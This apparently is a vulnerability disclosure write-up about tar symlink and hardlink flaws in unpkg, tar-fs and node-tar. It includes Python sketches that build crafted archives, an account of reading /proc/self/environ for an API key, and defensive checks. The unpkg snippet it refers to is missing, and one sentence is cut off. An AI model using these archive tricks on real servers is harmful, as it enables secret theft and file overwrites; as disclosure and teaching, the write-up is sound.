When you request a URL like https://unpkg.com/react@16.3.2/, unpkg checks whether it already has the package downloaded and extracted at /tmp/unpkg-react-16.3.2/. If it doesn’t, it pulls the corresponding tar file from npm.
Unpkg lets you read any file out of a package once it’s extracted. To serve react’s package.json file, for example, you can just visit https://unpkg.com/react@16.3.2/package.json. Or, to get a directory listing of the whole package, you can visit https://unpkg.com/react@16.3.2/.
Here’s a snippet of what unpkg used to extract the tar file when it pulled a package:
The first problem with this code is that it doesn’t actually ignore symlinks like it says it does. With this tar library, the header.type for a symlink entry is symlink, not link. So right away this gives us arbitrary file reads on the server: create a symlink to / and browse through the directory with the web interface.
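To make the type mix-up concrete, here is a minimal sketch in Python rather than unpkg's Node code. It is not the original snippet. The entry names, the link targets, and the helper names (build_archive, entry_kind, flawed_ignore, surviving_entries) are all made up for illustration; the only thing carried over from the post is the idea that symlinks and hardlinks are reported as two different entry types, so a filter that checks only for link lets symlinks through.

```python
import io
import tarfile


def build_archive() -> bytes:
    """Build an in-memory tar holding one symlink entry and one hardlink entry."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        sym = tarfile.TarInfo("package/sym")
        sym.type = tarfile.SYMTYPE       # symbolic link entry
        sym.linkname = "/"               # hypothetical target
        tar.addfile(sym)

        hard = tarfile.TarInfo("package/hard")
        hard.type = tarfile.LNKTYPE      # hard link entry
        hard.linkname = "package/sym"    # hypothetical target
        tar.addfile(hard)
    return buf.getvalue()


def entry_kind(member: tarfile.TarInfo) -> str:
    """Map a tar entry to the type strings used in the post."""
    if member.issym():
        return "symlink"
    if member.islnk():
        return "link"
    return "other"


def flawed_ignore(member: tarfile.TarInfo) -> bool:
    """Skips only 'link' entries, so symlink entries are NOT ignored."""
    return entry_kind(member) == "link"


def surviving_entries(data: bytes) -> list[str]:
    """Names of the entries that the flawed filter would still extract."""
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        return [m.name for m in tar if not flawed_ignore(m)]


if __name__ == "__main__":
    print(surviving_entries(build_archive()))
```

Nothing is extracted here; the sketch only inspects headers, so it is safe to run anywhere.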
The second problem with this code is that even if headers.type did correctly check for symlink, the main attack below still worked due to issues with the tar library’s implementation of
First exploit attempt
On my local instance of unpkg, I was able to use this bug to read /proc/self/environ, which would spit out the environment variables of the webserver process. In these environment variables is a Cloudflare API key, which I was thinking an attacker could use to do nefarious DNS-related things with their API (this was an untested assumption – I don’t know if Cloudflare supports restricting the permissions on their API keys).
Unfortunately (fortunately?), something about Heroku’s environment made it so that I couldn’t read /proc/self/environ on the real unpkg server. My guess is that this had to do with the incorrect HTTP Content-Length returned by the server. When reading /proc/self/environ, my local instance reported Content-Length: 0, but still returned the file in the response body. My guess is that some reasonably clever reverse proxy at Heroku sees the Content-Length: 0 and cuts out the body of the reply.
The reason the server returns Content-Length: 0 is that stat /proc/self/environ returns a size of 0, and that’s what unpkg uses to set that header.
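The mismatch between the stat size and the bytes you actually get back is easy to see for yourself. The sketch below is Python, not unpkg's code, and the helper name reported_and_actual_size is made up for this example. It assumes a Linux machine with /proc mounted; on other systems the demo simply skips the procfs part.

```python
import os


def reported_and_actual_size(path: str) -> tuple[int, int]:
    """Return (size reported by stat, number of bytes actually read)."""
    reported = os.stat(path).st_size
    with open(path, "rb") as fh:
        actual = len(fh.read())
    return reported, actual


if __name__ == "__main__":
    path = "/proc/self/environ"
    if os.path.exists(path):
        reported, actual = reported_and_actual_size(path)
        # A server that copies `reported` into Content-Length would announce
        # that size even though `actual` bytes end up in the response body.
        print(f"stat size: {reported}, bytes read: {actual}")
    else:
        print("no procfs here, nothing to compare")
```

For ordinary files the two numbers agree, which is why taking Content-Length from stat usually goes unnoticed.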
Second exploit attempt
At this point I was kind of bummed that I couldn’t figure out a way to take over this server. I went ahead and reported the symlink issue to the unpkg maintainer and went to sleep.
But then I started thinking more about tar files. We can extract files into a folder, we can create symlinks… can we extract files into a directory pointed to by a symlink that’s already been extracted? I pulled out my hex editor and made a tar file that tries this. It creates a symlink at exploit/link, and then tries to extract a file to exploit/link/oops.txt.
I figured there was no way this would work with any mature tar implementation, and sure enough this fails to extract on my laptop:
$ tar -xvf symlink-oops.tar
tar: exploit/link/oops.txt: Cannot open: Not a directory
tar: Exiting with failure status due to previous errors
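If you would rather not reach for a hex editor, an archive with the same shape can be put together with Python's tarfile module. This is a stand-in for the hand-made file, not a copy of it: the entry names come from the tar output above, but the symlink target (/tmp), the file contents, and the function names are assumptions made for the example.

```python
import io
import tarfile


def build_symlink_oops() -> bytes:
    """Build a tar with a symlink entry followed by a file placed 'under' it."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("exploit/link")
        link.type = tarfile.SYMTYPE
        link.linkname = "/tmp"            # hypothetical target
        tar.addfile(link)

        payload = b"oops\n"               # hypothetical contents
        oops = tarfile.TarInfo("exploit/link/oops.txt")
        oops.size = len(payload)
        tar.addfile(oops, io.BytesIO(payload))
    return buf.getvalue()


def list_entries(data: bytes) -> list[tuple[str, str, str]]:
    """Return (name, kind, link target) for each entry, without extracting."""
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        return [
            (m.name, "symlink" if m.issym() else "file", m.linkname)
            for m in tar
        ]


if __name__ == "__main__":
    for entry in list_entries(build_symlink_oops()):
        print(entry)
```

The sketch only builds and lists the archive. Whether a given extractor follows the symlink when it reaches the second entry is exactly the behavior under test.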
But unpkg doesn’t use GNU Tar; it uses a package called tar-fs, and tar-fs happily extracts this archive.
And then we win! Since we can write (and overwrite) files anywhere the webserver user is able to, we can overwrite files in the directories set aside for other packages, like /tmp/unpkg-react-16.3.2/. To test this out, I made two versions of a package and had the second version overwrite files in the first (it worked).
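One way an extractor can refuse this kind of write is to resolve each destination path through whatever symlinks already exist on disk and check that the result is still inside the extraction root. The sketch below shows that idea in Python. It is not how tar-fs was fixed (the post doesn't say), and the names resolves_inside and demo are invented for the example. A real extractor would also have to worry about races between the check and the write.

```python
import os
import tempfile


def resolves_inside(root: str, entry_name: str) -> bool:
    """True if entry_name, resolved through existing symlinks, stays under root."""
    root_real = os.path.realpath(root)
    dest_real = os.path.realpath(os.path.join(root_real, entry_name))
    return os.path.commonpath([root_real, dest_real]) == root_real


def demo() -> tuple[bool, bool]:
    """Recreate the on-disk state after the symlink entry has been extracted."""
    with tempfile.TemporaryDirectory() as outside, \
            tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "exploit"))
        # The already-extracted symlink points outside the extraction root.
        os.symlink(outside, os.path.join(root, "exploit", "link"))
        through_link = resolves_inside(root, "exploit/link/oops.txt")
        ordinary = resolves_inside(root, "exploit/readme.txt")
        return through_link, ordinary


if __name__ == "__main__":
    print(demo())
```

The first value is the write that goes through the symlink and the second is an ordinary file in the same package, so a check like this separates the two cases.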
A worse bug than I thought
Many tar implementations also support unpacking hardlinks. Since creating a hardlink to a directory is more often than not an invalid operation, I made a variant of my original exploit that would:
- Make a hardlink foo to a file I knew should exist and
- Unpack a regular file named foo with arbitrary contents
tar-fs was vulnerable to this attack as well and would allow me to overwrite files as long as I had the proper permissions and knew where they lived on the filesystem.
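The two steps above work because a hardlink and its target are the same file on disk: opening foo for writing in place rewrites the target too. Here is a small Python sketch of that effect using plain filesystem calls instead of a tar library. The file names and the function overwrite_via_hardlink are hypothetical, and removing the existing path before writing is shown only as one possible mitigation, not as the fix the maintainers shipped.

```python
import os
import tempfile


def overwrite_via_hardlink(unlink_first: bool) -> str:
    """Replay the two steps and return what the victim file contains afterwards."""
    with tempfile.TemporaryDirectory() as work:
        victim = os.path.join(work, "victim.txt")
        with open(victim, "w") as fh:
            fh.write("original")

        foo = os.path.join(work, "foo")
        os.link(victim, foo)          # step 1: hardlink foo to an existing file

        if unlink_first:
            os.unlink(foo)            # possible mitigation: drop the link first
        with open(foo, "w") as fh:    # step 2: unpack a regular file named foo
            fh.write("attacker")

        with open(victim) as fh:
            return fh.read()


if __name__ == "__main__":
    print(overwrite_via_hardlink(unlink_first=False))
    print(overwrite_via_hardlink(unlink_first=True))
```

Without the unlink, the write lands in the victim file; with it, foo becomes a fresh file and the victim is left alone.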
After reporting this variant of the original bug to the tar-fs maintainer, he got back to me the next morning sounding a little worried. Surprisingly, node-tar, a much more popular tar library, was vulnerable to the hardlink variant. The tar-fs maintainer and I submitted a bug report and node-tar was quickly patched as well.
Oh, and if you ever need a textbook example of defense-in-depth doing its job, just remember that the only reason the npm client (which uses pacote and thus node-tar) wasn’t vulnerable to this attack was that a pacote developer made the prescient decision to never extract hardlinks or softlinks.
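The "never extract links" policy is simple to express as an allow-list: keep regular files and directories, drop everything else. The following Python sketch illustrates the idea only. It is not pacote's code, and the sample archive, entry names, and function names are made up for the example.

```python
import io
import tarfile


def build_sample() -> bytes:
    """Build a tar with one regular file, one symlink, and one hardlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        body = b"module.exports = {};\n"
        regular = tarfile.TarInfo("package/index.js")
        regular.size = len(body)
        tar.addfile(regular, io.BytesIO(body))

        sym = tarfile.TarInfo("package/sym")
        sym.type = tarfile.SYMTYPE
        sym.linkname = "/"                     # hypothetical target
        tar.addfile(sym)

        hard = tarfile.TarInfo("package/hard")
        hard.type = tarfile.LNKTYPE
        hard.linkname = "package/index.js"     # hypothetical target
        tar.addfile(hard)
    return buf.getvalue()


def safe_members(data: bytes) -> list[str]:
    """Allow-list: keep regular files and directories, drop every link type."""
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        return [m.name for m in tar if m.isfile() or m.isdir()]


if __name__ == "__main__":
    print(safe_members(build_sample()))
```

An allow-list has the nice property that entry types nobody thought about (devices, FIFOs, and so on) are dropped by default.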